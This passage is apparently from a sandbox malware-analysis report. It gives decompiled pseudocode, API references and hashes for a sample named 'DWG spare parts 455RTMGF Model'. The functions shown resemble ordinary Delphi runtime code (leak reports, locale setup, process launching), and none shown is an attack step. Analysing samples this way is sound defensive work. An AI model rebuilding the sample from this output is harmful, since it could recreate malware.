                                                                						__eflags = _t194 & 0x00000001;
                                                                						if((_t194 & 0x00000001) == 0) {
                                                                							__eflags = _t194 & 0x00000004;
                                                                							if(__eflags == 0) {
                                                                								__eflags = _v112652 - 0x1000;
                                                                								if(_v112652 < 0x1000) {
                                                                									_v112664 = (_t194 & 0xfffffff0) - 4;
                                                                									_t126 = E025123BC(_t131);
                                                                									__eflags = _t126;
                                                                									if(_t126 == 0) {
                                                                										_v112645 = 0;
                                                                										 *((intOrPtr*)(_t198 + _v112652 * 4 - 0x1f828)) = _v112664;
                                                                										_t18 =  &_v112652;
                                                                										 *_t18 = _v112652 + 1;
                                                                										__eflags =  *_t18;
                                                                									}
                                                                								}
                                                                							} else {
                                                                								E02512414(_t131, __eflags, _t198);
                                                                							}
                                                                						}
                                                                						_t79 = E02512054(_t131);
                                                                						_t131 = _t79;
                                                                						__eflags = _t131;
                                                                					} while (_t131 != 0);
                                                                					goto L12;
                                                                				}
                                                                				_t132 =  *0x256c7a8; // 0x7ef90000
                                                                				while(_t132 != 0x256c7a4 && _v112652 < 0x1000) {
                                                                					_t79 = E025123BC(_t132 + 0x10);
                                                                					__eflags = _t79;
                                                                					if(_t79 == 0) {
                                                                						_v112645 = 0;
                                                                						_t22 = _t132 + 0xc; // 0x80004
                                                                						_t79 = _v112652;
                                                                						 *((intOrPtr*)(_t198 + _t79 * 4 - 0x1f828)) = ( *_t22 & 0xfffffff0) - 0xfffffffffffffff4;
                                                                						_t27 =  &_v112652;
                                                                						 *_t27 = _v112652 + 1;
                                                                						__eflags =  *_t27;
                                                                					}
                                                                					_t29 = _t132 + 4; // 0x7f010000
                                                                					_t132 =  *_t29;
                                                                				}
                                                                				if(_v112645 != 0) {
                                                                					L49:
                                                                					return _t79;
                                                                				}
                                                                				_v112653 = 0;
                                                                				_v112668 = 0;
                                                                				_t134 = E02512210(0x28,  &_v161836);
                                                                				_v112660 = 0x37;
                                                                				_v112680 = 0x252d046;
                                                                				_v112684 =  &_v110600;
                                                                				do {
                                                                					_v112672 = ( *_v112680 & 0x0000ffff) - 4;
                                                                					_v112654 = 0;
                                                                					_t182 = 0xff;
                                                                					_t188 = _v112684;
                                                                					while(_t134 <=  &_v131117) {
                                                                						if( *_t188 > 0) {
                                                                							if(_v112653 == 0) {
                                                                								_t134 = E02512210(0x27, _t134);
                                                                								_v112653 = 1;
                                                                							}
                                                                							if(_v112654 != 0) {
                                                                								 *_t134 = 0x2c;
                                                                								_t139 = _t134 + 1;
                                                                								 *_t139 = 0x20;
                                                                								_t140 = _t139 + 1;
                                                                								__eflags = _t139 + 1;
                                                                							} else {
                                                                								 *_t134 = 0xd;
                                                                								 *((char*)(_t134 + 1)) = 0xa;
                                                                								_t147 = E025120F4(_v112668 + 1, _t134 + 2);
                                                                								 *_t147 = 0x20;
                                                                								_t148 = _t147 + 1;
                                                                								 *_t148 = 0x2d;
                                                                								 *((char*)(_t148 + 1)) = 0x20;
                                                                								_t140 = E02512210(8, E025120F4(_v112672, _t148 + 2));
                                                                								_v112654 = 1;
                                                                							}
                                                                							_t214 = _t182 - 1;
                                                                							if(_t214 < 0) {
                                                                								_t141 = E02512210(7, _t140);
                                                                							} else {
                                                                								if(_t214 == 0) {
                                                                									_t141 = E02512210(6, _t140);
                                                                								} else {
                                                                									E02513BD8( *((intOrPtr*)(_t188 - 4)),  &_v162092);
                                                                									_t141 = E02512210(_v162092 & 0x000000ff, _t140);
                                                                								}
                                                                							}
                                                                							 *_t141 = 0x20;
                                                                							_t142 = _t141 + 1;
                                                                							 *_t142 = 0x78;
                                                                							 *((char*)(_t142 + 1)) = 0x20;
                                                                							_t134 = E025120F4( *_t188, _t142 + 2);
                                                                						}
                                                                						_t182 = _t182 - 1;
                                                                						_t188 = _t188 - 8;
                                                                						if(_t182 != 0xffffffff) {
                                                                							continue;
                                                                						} else {
                                                                							goto L38;
                                                                						}
                                                                					}
                                                                					L38:
                                                                					_v112668 = _v112672;
                                                                					_v112684 = _v112684 + 0x800;
                                                                					_v112680 =  &(_v112680[0x10]);
                                                                					_t60 =  &_v112660;
                                                                					 *_t60 = _v112660 - 1;
                                                                				} while ( *_t60 != 0);
                                                                				if(_v112652 <= 0) {
                                                                					L48:
                                                                					E02512210(3, _t134);
                                                                					_t79 = MessageBoxA(0,  &_v161836, "Unexpected Memory Leak", 0x2010);
                                                                					goto L49;
                                                                				}
                                                                				if(_v112653 != 0) {
                                                                					 *_t134 = 0xd;
                                                                					_t136 = _t134 + 1;
                                                                					 *_t136 = 0xa;
                                                                					_t137 = _t136 + 1;
                                                                					 *_t137 = 0xd;
                                                                					_t138 = _t137 + 1;
                                                                					 *_t138 = 0xa;
                                                                					_t134 = _t138 + 1;
                                                                				}
                                                                				_t134 = E02512210(0x3c, _t134);
                                                                				_t184 = _v112652 - 1;
                                                                				if(_t184 >= 0) {
                                                                					_t185 = _t184 + 1;
                                                                					_v112676 = 0;
                                                                					_t189 =  &_v129068;
                                                                					L44:
                                                                					L44:
                                                                					if(_v112676 != 0) {
                                                                						 *_t134 = 0x2c;
                                                                						_t135 = _t134 + 1;
                                                                						 *_t135 = 0x20;
                                                                						_t134 = _t135 + 1;
                                                                					}
                                                                					_t134 = E025120F4( *_t189, _t134);
                                                                					if(_t134 >  &_v131117) {
                                                                						goto L48;
                                                                					}
                                                                					_v112676 =  &(_v112676->i);
                                                                					_t189 = _t189 + 4;
                                                                					_t185 = _t185 - 1;
                                                                					if(_t185 != 0) {
                                                                						goto L44;
                                                                					}
                                                                				}
                                                                				L2:
                                                                				_t200 = _t200 + 0xfffff004;
                                                                				_push(_t73);
                                                                				_t73 = _t73 - 1;
                                                                				if(_t73 != 0) {
                                                                					goto L2;
                                                                				} else {
                                                                					E02513518( &_v112644, 0x1b800);
                                                                					E02513518( &_v129068, 0x4000);
                                                                					_t79 = 0;
                                                                					_v112652 = 0;
                                                                					_v112645 = 1;
                                                                					_t180 =  *0x256a704; // 0x2920000
                                                                					goto L13;
                                                                				}
                                                                			}















































                                                                0x025125a5
                                                                0x025125ab
                                                                0x025125b2
                                                                0x00000000
                                                                0x025125b2

                                                                Strings
                                                                • The sizes of unexpected leaked medium and large blocks are: , xrefs: 02512879
                                                                • Unexpected Memory Leak, xrefs: 025128F0
                                                                • , xrefs: 02512844
                                                                • 7, xrefs: 025126D1
                                                                • bytes: , xrefs: 0251278D
                                                                • The unexpected small block leaks are:, xrefs: 02512737
                                                                • An unexpected memory leak has occurred. , xrefs: 025126C0
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.258561577.0000000002511000.00000020.00001000.00020000.00000000.sdmp, Offset: 02510000, based on PE: true
                                                                • Associated: 00000000.00000002.258558187.0000000002510000.00000002.00001000.00020000.00000000.sdmp
                                                                • Associated: 00000000.00000002.258580914.000000000252D000.00000004.00001000.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2510000_DWG spare parts 455RTMGF Model.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID:
                                                                • String ID: $ bytes: $7$An unexpected memory leak has occurred. $The sizes of unexpected leaked medium and large blocks are: $The unexpected small block leaks are:$Unexpected Memory Leak
                                                                • API String ID: 0-2723507874
                                                                • Opcode ID: 8eb76d2c27bfd29a0c7d6e17a13711e86c582e26836f690e978950f0a8aa3c3e
                                                                • Instruction ID: f0340b32a79c07b0e6ccb26e9f1c06597361ab1ef63aa3703c23b573fa879cfc
                                                                • Opcode Fuzzy Hash: 8eb76d2c27bfd29a0c7d6e17a13711e86c582e26836f690e978950f0a8aa3c3e
                                                                • Instruction Fuzzy Hash: D671D330B042B88FFF219A2CC884BD9BAE5FB49714F1041E5D849DB285DB798AC5CF59
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                C-Code - Quality: 72%
                                                                			E0251BF84(void* __ebx, void* __edx, void* __edi, void* __esi) {
                                                                				char _v8;
                                                                				char _v12;
                                                                				char _v16;
                                                                				char _v20;
                                                                				char _v24;
                                                                				char _v28;
                                                                				char _v32;
                                                                				char _v36;
                                                                				char _v40;
                                                                				char _v44;
                                                                				char _v48;
                                                                				char _v52;
                                                                				char _v56;
                                                                				char _v60;
                                                                				char _v64;
                                                                				char _v68;
                                                                				void* _t104;
                                                                				void* _t111;
                                                                				void* _t133;
                                                                				intOrPtr _t183;
                                                                				intOrPtr _t193;
                                                                				intOrPtr _t194;
                                                                
                                                                				_t191 = __esi;
                                                                				_t190 = __edi;
                                                                				_t193 = _t194;
                                                                				_t133 = 8;
                                                                				do {
                                                                					_push(0);
                                                                					_push(0);
                                                                					_t133 = _t133 - 1;
                                                                				} while (_t133 != 0);
                                                                				_push(__ebx);
                                                                				_push(_t193);
                                                                				_push(0x251c24f);
                                                                				_push( *[fs:eax]);
                                                                				 *[fs:eax] = _t194;
                                                                				E0251BEC0();
                                                                				E0251AA84(__ebx, __edi, __esi);
                                                                				_t196 =  *0x256c8d0;
                                                                				if( *0x256c8d0 != 0) {
                                                                					E0251AC5C(__esi, _t196);
                                                                				}
                                                                				_t132 = GetThreadLocale();
                                                                				E0251A9D0(_t43, 0, 0x14,  &_v20);
                                                                				E025148F4(0x256c804, _v20);
                                                                				E0251A9D0(_t43, 0x251c264, 0x1b,  &_v24);
                                                                				 *0x256c808 = E02517DDC(0x251c264, 0, _t196);
                                                                				E0251A9D0(_t132, 0x251c264, 0x1c,  &_v28);
                                                                				 *0x256c809 = E02517DDC(0x251c264, 0, _t196);
                                                                				 *0x256c80a = E0251AA1C(_t132, 0x2c, 0xf);
                                                                				 *0x256c80b = E0251AA1C(_t132, 0x2e, 0xe);
                                                                				E0251A9D0(_t132, 0x251c264, 0x19,  &_v32);
                                                                				 *0x256c80c = E02517DDC(0x251c264, 0, _t196);
                                                                				 *0x256c80d = E0251AA1C(_t132, 0x2f, 0x1d);
                                                                				E0251A9D0(_t132, "m/d/yy", 0x1f,  &_v40);
                                                                				E0251AD0C(_v40, _t132,  &_v36, _t190, _t191, _t196);
                                                                				E025148F4(0x256c810, _v36);
                                                                				E0251A9D0(_t132, "mmmm d, yyyy", 0x20,  &_v48);
                                                                				E0251AD0C(_v48, _t132,  &_v44, _t190, _t191, _t196);
                                                                				E025148F4(0x256c814, _v44);
                                                                				 *0x256c818 = E0251AA1C(_t132, 0x3a, 0x1e);
                                                                				E0251A9D0(_t132, 0x251c298, 0x28,  &_v52);
                                                                				E025148F4(0x256c81c, _v52);
                                                                				E0251A9D0(_t132, 0x251c2a4, 0x29,  &_v56);
                                                                				E025148F4(0x256c820, _v56);
                                                                				E025148A0( &_v12);
                                                                				E025148A0( &_v16);
                                                                				E0251A9D0(_t132, 0x251c264, 0x25,  &_v60);
                                                                				_t104 = E02517DDC(0x251c264, 0, _t196);
                                                                				_t197 = _t104;
                                                                				if(_t104 != 0) {
                                                                					E02514938( &_v8, 0x251c2bc);
                                                                				} else {
                                                                					E02514938( &_v8, 0x251c2b0);
                                                                				}
                                                                				E0251A9D0(_t132, 0x251c264, 0x23,  &_v64);
                                                                				_t111 = E02517DDC(0x251c264, 0, _t197);
                                                                				_t198 = _t111;
                                                                				if(_t111 == 0) {
                                                                					E0251A9D0(_t132, 0x251c264, 0x1005,  &_v68);
                                                                					if(E02517DDC(0x251c264, 0, _t198) != 0) {
                                                                						E02514938( &_v12, 0x251c2d8);
                                                                					} else {
                                                                						E02514938( &_v16, 0x251c2c8);
                                                                					}
                                                                				}
                                                                				_push(_v12);
                                                                				_push(_v8);
                                                                				_push(":mm");
                                                                				_push(_v16);
                                                                				E02514C24();
                                                                				_push(_v12);
                                                                				_push(_v8);
                                                                				_push(":mm:ss");
                                                                				_push(_v16);
                                                                				E02514C24();
                                                                				 *0x256c8d2 = E0251AA1C(_t132, 0x2c, 0xc);
                                                                				_pop(_t183);
                                                                				 *[fs:eax] = _t183;
                                                                				_push(E0251C256);
                                                                				return E025148C4( &_v68, 0x10);
                                                                			}


























                                                                APIs
                                                                • GetThreadLocale.KERNEL32(00000000,0251C24F,?,?,00000000,00000000), ref: 0251BFBA
                                                                  • Part of subcall function 0251A9D0: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 0251A9EE
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.258561577.0000000002511000.00000020.00001000.00020000.00000000.sdmp, Offset: 02510000, based on PE: true
                                                                • Associated: 00000000.00000002.258558187.0000000002510000.00000002.00001000.00020000.00000000.sdmp
                                                                • Associated: 00000000.00000002.258580914.000000000252D000.00000004.00001000.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2510000_DWG spare parts 455RTMGF Model.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Locale$InfoThread
                                                                • String ID: AMPM$:mm$:mm:ss$AMPM $m/d/yy$mmmm d, yyyy
                                                                • API String ID: 4232894706-2493093252
                                                                • Opcode ID: 66e09f3296affcbc7cb2092d55300fff5c9221c064742166beeee9eab43301c2
                                                                • Instruction ID: 21f0150e1b9f25d3e39d859a0b052ed0445cc5756e3ba22558682af15570367f
                                                                • Opcode Fuzzy Hash: 66e09f3296affcbc7cb2092d55300fff5c9221c064742166beeee9eab43301c2
                                                                • Instruction Fuzzy Hash: F661AE34B4028A9BFB05EBE8C844AEF77E7BBC8701F109436E041AB245CA39C945DB5D
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                C-Code - Quality: 77%
                                                                			E0251E5CC(short* __eax, intOrPtr __ecx, signed short* __edx) {
                                                                				char _v260;
                                                                				char _v768;
                                                                				char _v772;
                                                                				short* _v776;
                                                                				intOrPtr _v780;
                                                                				char _v784;
                                                                				signed int _v788;
                                                                				signed short* _v792;
                                                                				char _v796;
                                                                				char _v800;
                                                                				intOrPtr* _v804;
                                                                				void* __ebp;
                                                                				signed char _t47;
                                                                				signed int _t54;
                                                                				void* _t62;
                                                                				intOrPtr* _t73;
                                                                				signed short* _t91;
                                                                				void* _t93;
                                                                				void* _t95;
                                                                				void* _t98;
                                                                				void* _t99;
                                                                				intOrPtr* _t108;
                                                                				void* _t112;
                                                                				intOrPtr _t113;
                                                                				char* _t114;
                                                                				void* _t115;
                                                                
                                                                				_t100 = __ecx;
                                                                				_v780 = __ecx;
                                                                				_t91 = __edx;
                                                                				_v776 = __eax;
                                                                				if(( *(__edx + 1) & 0x00000020) == 0) {
                                                                					E0251E20C(0x80070057);
                                                                				}
                                                                				_t47 =  *_t91 & 0x0000ffff;
                                                                				if((_t47 & 0x00000fff) != 0xc) {
                                                                					_push(_t91);
                                                                					_push(_v776);
                                                                					L0251CFCC();
                                                                					return E0251E20C(_v776);
                                                                				} else {
                                                                					if((_t47 & 0x00000040) == 0) {
                                                                						_v792 = _t91[4];
                                                                					} else {
                                                                						_v792 =  *(_t91[4]);
                                                                					}
                                                                					_v788 =  *_v792 & 0x0000ffff;
                                                                					_t93 = _v788 - 1;
                                                                					if(_t93 < 0) {
                                                                						L9:
                                                                						_push( &_v772);
                                                                						_t54 = _v788;
                                                                						_push(_t54);
                                                                						_push(0xc);
                                                                						L0251D424();
                                                                						_t113 = _t54;
                                                                						if(_t113 == 0) {
                                                                							E0251DF64(_t100);
                                                                						}
                                                                						E0251E524(_v776);
                                                                						 *_v776 = 0x200c;
                                                                						 *((intOrPtr*)(_v776 + 8)) = _t113;
                                                                						_t95 = _v788 - 1;
                                                                						if(_t95 < 0) {
                                                                							L14:
                                                                							_t97 = _v788 - 1;
                                                                							if(E0251E540(_v788 - 1, _t115) != 0) {
                                                                								L0251D43C();
                                                                								E0251E20C(_v792);
                                                                								L0251D43C();
                                                                								E0251E20C( &_v260);
                                                                								_v780(_t113,  &_v260,  &_v800, _v792,  &_v260,  &_v796);
                                                                							}
                                                                							_t62 = E0251E570(_t97, _t115);
                                                                						} else {
                                                                							_t98 = _t95 + 1;
                                                                							_t73 =  &_v768;
                                                                							_t108 =  &_v260;
                                                                							do {
                                                                								 *_t108 =  *_t73;
                                                                								_t108 = _t108 + 4;
                                                                								_t73 = _t73 + 8;
                                                                								_t98 = _t98 - 1;
                                                                							} while (_t98 != 0);
                                                                							do {
                                                                								goto L14;
                                                                							} while (_t62 != 0);
                                                                							return _t62;
                                                                						}
                                                                					} else {
                                                                						_t99 = _t93 + 1;
                                                                						_t112 = 0;
                                                                						_t114 =  &_v772;
                                                                						do {
                                                                							_v804 = _t114;
                                                                							_push(_v804 + 4);
                                                                							_t18 = _t112 + 1; // 0x1
                                                                							_push(_v792);
                                                                							L0251D42C();
                                                                							E0251E20C(_v792);
                                                                							_push( &_v784);
                                                                							_t21 = _t112 + 1; // 0x1
                                                                							_push(_v792);
                                                                							L0251D434();
                                                                							E0251E20C(_v792);
                                                                							 *_v804 = _v784 -  *((intOrPtr*)(_v804 + 4)) + 1;
                                                                							_t112 = _t112 + 1;
                                                                							_t114 = _t114 + 8;
                                                                							_t99 = _t99 - 1;
                                                                						} while (_t99 != 0);
                                                                						goto L9;
                                                                					}
                                                                				}
                                                                			}






























                                                                APIs
                                                                • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 0251E665
                                                                • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 0251E681
                                                                • SafeArrayCreate.OLEAUT32(0000000C,?,?), ref: 0251E6BA
                                                                • SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 0251E737
                                                                • SafeArrayPtrOfIndex.OLEAUT32(00000000,?,?), ref: 0251E750
                                                                • VariantCopy.OLEAUT32(?), ref: 0251E785
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.258561577.0000000002511000.00000020.00001000.00020000.00000000.sdmp, Offset: 02510000, based on PE: true
                                                                • Associated: 00000000.00000002.258558187.0000000002510000.00000002.00001000.00020000.00000000.sdmp
                                                                • Associated: 00000000.00000002.258580914.000000000252D000.00000004.00001000.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2510000_DWG spare parts 455RTMGF Model.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: ArraySafe$BoundIndex$CopyCreateVariant
                                                                • String ID:
                                                                • API String ID: 351091851-3916222277
                                                                • Opcode ID: d94f510cd20c3572f14f1eea84ef244383f3df022967f07e0074afa02e153631
                                                                • Instruction ID: 078b41783a137e6215484ea1f47a167552d742aebf490e0e6e6e86c4f2d7aeb1
                                                                • Opcode Fuzzy Hash: d94f510cd20c3572f14f1eea84ef244383f3df022967f07e0074afa02e153631
                                                                • Instruction Fuzzy Hash: 85510B7590162E9BEB26DB58C891BD9B7BDBF88300F4041D5EA09E7201D770AF808F69
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                C-Code - Quality: 79%
                                                                			E02514720(void* __ecx) {
                                                                				long _v4;
                                                                				int _t3;
                                                                
                                                                				if( *0x256a044 == 0) {
                                                                					if( *0x252d030 == 0) {
                                                                						_t3 = MessageBoxA(0, "Runtime error     at 00000000", "Error", 0);
                                                                					}
                                                                					return _t3;
                                                                				} else {
                                                                					if( *0x256a218 == 0xd7b2 &&  *0x256a220 > 0) {
                                                                						 *0x256a230();
                                                                					}
                                                                					WriteFile(GetStdHandle(0xfffffff5), "Runtime error     at 00000000", 0x1e,  &_v4, 0);
                                                                					return WriteFile(GetStdHandle(0xfffffff5), E025147A8, 2,  &_v4, 0);
                                                                				}
                                                                			}






                                                                APIs
                                                                • GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001E,?,00000000,?,025147E7,?,?,0256C7C0,?,?,0252D7CC,025167FD,0252C2BD), ref: 02514759
                                                                • WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,025147E7,?,?,0256C7C0,?,?,0252D7CC,025167FD,0252C2BD), ref: 0251475F
                                                                • GetStdHandle.KERNEL32(000000F5,025147A8,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,025147E7,?,?,0256C7C0), ref: 02514774
                                                                • WriteFile.KERNEL32(00000000,000000F5,025147A8,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,025147E7,?,?), ref: 0251477A
                                                                • MessageBoxA.USER32 ref: 02514798
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.258561577.0000000002511000.00000020.00001000.00020000.00000000.sdmp, Offset: 02510000, based on PE: true
                                                                • Associated: 00000000.00000002.258558187.0000000002510000.00000002.00001000.00020000.00000000.sdmp
                                                                • Associated: 00000000.00000002.258580914.000000000252D000.00000004.00001000.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2510000_DWG spare parts 455RTMGF Model.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: FileHandleWrite$Message
                                                                • String ID: Error$Runtime error at 00000000
                                                                • API String ID: 1570097196-2970929446
                                                                • Opcode ID: 7e2ca54f1a094b56d33ad19a3a6ed195d94fdef64d5ae14cd35e119c897ffba4
                                                                • Instruction ID: 1e461204f78f530b12c03fb6e0f3d03530bc09e991df8232ed9ccf7c66b00f1d
                                                                • Opcode Fuzzy Hash: 7e2ca54f1a094b56d33ad19a3a6ed195d94fdef64d5ae14cd35e119c897ffba4
                                                                • Instruction Fuzzy Hash: 6EF0BBA0AC530578FB106764DD49F69377C7B82F11F348B45F754B60C097A454C9A62D
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                C-Code - Quality: 100%
                                                                			E0251B0D0(void* __edx, void* __edi, void* __fp0) {
                                                                				void _v1024;
                                                                				char _v1088;
                                                                				long _v1092;
                                                                				void* _t12;
                                                                				char* _t14;
                                                                				intOrPtr _t16;
                                                                				intOrPtr _t18;
                                                                				intOrPtr _t24;
                                                                				long _t32;
                                                                
                                                                				E0251AF48(_t12,  &_v1024, __edx, __fp0, 0x400);
                                                                				_t14 =  *0x2569d64; // 0x256a044
                                                                				if( *_t14 == 0) {
                                                                					_t16 =  *0x2569c60; // 0x2516b6c
                                                                					_t9 = _t16 + 4; // 0xffe9
                                                                					_t18 =  *0x256c7f0; // 0x2510000
                                                                					LoadStringA(E02515AF0(_t18),  *_t9,  &_v1088, 0x40);
                                                                					return MessageBoxA(0,  &_v1024,  &_v1088, 0x2010);
                                                                				}
                                                                				_t24 =  *0x2569c84; // 0x256a214
                                                                				E02512D28(E025133B0(_t24));
                                                                				CharToOemA( &_v1024,  &_v1024);
                                                                				_t32 = E025182E4( &_v1024, __edi);
                                                                				WriteFile(GetStdHandle(0xfffffff4),  &_v1024, _t32,  &_v1092, 0);
                                                                				return WriteFile(GetStdHandle(0xfffffff4), 0x251b194, 2,  &_v1092, 0);
                                                                			}













                                                                APIs
                                                                  • Part of subcall function 0251AF48: VirtualQuery.KERNEL32(?,?,0000001C), ref: 0251AF65
                                                                  • Part of subcall function 0251AF48: GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 0251AF89
                                                                  • Part of subcall function 0251AF48: GetModuleFileNameA.KERNEL32(02510000,?,00000105), ref: 0251AFA4
                                                                  • Part of subcall function 0251AF48: LoadStringA.USER32 ref: 0251B03A
                                                                • CharToOemA.USER32 ref: 0251B107
                                                                • GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000,?,?), ref: 0251B124
                                                                • WriteFile.KERNEL32(00000000,000000F4,?,00000000,?,00000000,?,?), ref: 0251B12A
                                                                • GetStdHandle.KERNEL32(000000F4,0251B194,00000002,?,00000000,00000000,000000F4,?,00000000,?,00000000,?,?), ref: 0251B13F
                                                                • WriteFile.KERNEL32(00000000,000000F4,0251B194,00000002,?,00000000,00000000,000000F4,?,00000000,?,00000000,?,?), ref: 0251B145
                                                                • LoadStringA.USER32 ref: 0251B167
                                                                • MessageBoxA.USER32 ref: 0251B17D
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.258561577.0000000002511000.00000020.00001000.00020000.00000000.sdmp, Offset: 02510000, based on PE: true
                                                                • Associated: 00000000.00000002.258558187.0000000002510000.00000002.00001000.00020000.00000000.sdmp
                                                                • Associated: 00000000.00000002.258580914.000000000252D000.00000004.00001000.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2510000_DWG spare parts 455RTMGF Model.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: File$HandleLoadModuleNameStringWrite$CharMessageQueryVirtual
                                                                • String ID:
                                                                • API String ID: 185507032-0
                                                                • Opcode ID: bb309dfd9441fb225c89291859def52419afcb2f43cca775a1139ad32574fe74
                                                                • Instruction ID: d774e99979422327d60548b3293fa6743445814e24d9ca7a3a9fdb8a454835ce
                                                                • Opcode Fuzzy Hash: bb309dfd9441fb225c89291859def52419afcb2f43cca775a1139ad32574fe74
                                                                • Instruction Fuzzy Hash: 08111CB2584206BBF301EBA4CC85F9A77EEBB85700F404916B255D70D0DA75E944CB6E
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                C-Code - Quality: 68%
                                                                			E02525722(void* __eax, void* __ebx, short __ecx, void* __edx, void* __edi, void* __esi, void* __eflags, void* __fp0) {
                                                                				struct _STARTUPINFOA _v72;
                                                                				struct _PROCESS_INFORMATION _v88;
                                                                				char _v344;
                                                                				char _v348;
                                                                				char _v352;
                                                                				char _v356;
                                                                				char _v360;
                                                                				char _v364;
                                                                				char _v368;
                                                                				CHAR* _t49;
                                                                				int _t54;
                                                                				void* _t67;
                                                                				intOrPtr _t83;
                                                                				short _t86;
                                                                				void* _t88;
                                                                				void* _t91;
                                                                
                                                                				_t93 = __eflags;
                                                                				_v360 = 0;
                                                                				_v368 = 0;
                                                                				_v364 = 0;
                                                                				_v348 = 0;
                                                                				_v352 = 0;
                                                                				_v356 = 0;
                                                                				_t86 = __ecx;
                                                                				_t88 = __edx;
                                                                				_t67 = __eax;
                                                                				_push(_t91);
                                                                				_push(0x2525888);
                                                                				_push( *[fs:eax]);
                                                                				 *[fs:eax] = _t91 + 0xfffffe94;
                                                                				_push(0x25258a0);
                                                                				E02514B04( &_v352, __eax, __eflags);
                                                                				_push(_v352);
                                                                				_push(0x25258ac);
                                                                				E02514B04( &_v356, _t88, __eflags);
                                                                				_push(_v356);
                                                                				E02514C24();
                                                                				E02514B3C( &_v344, 0xff, _v348);
                                                                				E02513518( &_v72, 0x44);
                                                                				_v72.cb = 0x44;
                                                                				_v72.dwFlags = 1;
                                                                				_v72.wShowWindow = _t86;
                                                                				E02514B04( &_v364, _t67, _t93);
                                                                				E025181AC(_v364,  &_v360);
                                                                				_t49 = E02514D64(_v360);
                                                                				E02514B04( &_v368,  &_v344, _t93);
                                                                				_t54 = CreateProcessA(0, E02514D64(_v368), 0, 0, 0, 0x30, 0, _t49,  &_v72,  &_v88);
                                                                				asm("sbb eax, eax");
                                                                				if(_t54 + 1 != 0) {
                                                                					WaitForSingleObject(_v88.hProcess, 0xffffffff);
                                                                					CloseHandle(_v88);
                                                                					CloseHandle(_v88.hThread);
                                                                				}
                                                                				_pop(_t83);
                                                                				 *[fs:eax] = _t83;
                                                                				_push(E0252588F);
                                                                				return E025148C4( &_v368, 6);
                                                                			}




















                                                                APIs
                                                                • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000030,00000000,00000000,00000044,?), ref: 0252583C
                                                                • WaitForSingleObject.KERNEL32(?,000000FF,00000000,00000000,00000000,00000000,00000000,00000030,00000000,00000000,00000044,?), ref: 02525853
                                                                • CloseHandle.KERNEL32(?,?,000000FF,00000000,00000000,00000000,00000000,00000000,00000030,00000000,00000000,00000044,?), ref: 0252585C
                                                                • CloseHandle.KERNEL32(?,?,?,000000FF,00000000,00000000,00000000,00000000,00000000,00000030,00000000,00000000,00000044,?), ref: 02525865
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.258561577.0000000002511000.00000020.00001000.00020000.00000000.sdmp, Offset: 02510000, based on PE: true
                                                                • Associated: 00000000.00000002.258558187.0000000002510000.00000002.00001000.00020000.00000000.sdmp
                                                                • Associated: 00000000.00000002.258580914.000000000252D000.00000004.00001000.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2510000_DWG spare parts 455RTMGF Model.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: CloseHandle$CreateObjectProcessSingleWait
                                                                • String ID: D
                                                                • API String ID: 2059082233-2746444292
                                                                • Opcode ID: d0b804083d4eec0d328dc77a970b2602b306dff6b8b5f07bf10e92e9fe5bc97d
                                                                • Instruction ID: 587cf80a35bc4cc6b0a73620bc7c2b2e8bed606a63a2245f0d91c501005f9303
                                                                • Opcode Fuzzy Hash: d0b804083d4eec0d328dc77a970b2602b306dff6b8b5f07bf10e92e9fe5bc97d
                                                                • Instruction Fuzzy Hash: 46315271A003599FEF20DF94CC81BDEB7B9FB89310F5041B5A508A7280DA759E89CF58
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                C-Code - Quality: 68%
                                                                			E02525724(void* __eax, void* __ebx, short __ecx, void* __edx, void* __edi, void* __esi, void* __eflags, void* __fp0) {
                                                                				struct _STARTUPINFOA _v72;
                                                                				struct _PROCESS_INFORMATION _v88;
                                                                				char _v344;
                                                                				char _v348;
                                                                				char _v352;
                                                                				char _v356;
                                                                				char _v360;
                                                                				char _v364;
                                                                				char _v368;
                                                                				CHAR* _t49;
                                                                				int _t54;
                                                                				void* _t67;
                                                                				intOrPtr _t83;
                                                                				short _t86;
                                                                				void* _t88;
                                                                				void* _t91;
                                                                
                                                                				_t93 = __eflags;
                                                                				_v360 = 0;
                                                                				_v368 = 0;
                                                                				_v364 = 0;
                                                                				_v348 = 0;
